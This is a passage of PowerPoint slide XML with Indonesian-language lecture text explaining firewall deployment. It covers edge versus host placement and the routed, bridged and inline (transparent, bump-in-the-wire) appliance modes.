              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas zona; yang lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Firewall appliance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Dirutekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP dan MAC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Bridged (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lewat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua node, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router dan switch. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjembatani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Ethernet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua node, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2, firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyaring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Inline (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP. Lalu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diteruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bump-in-the-wire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode firewall bridged dan inline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Kasus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
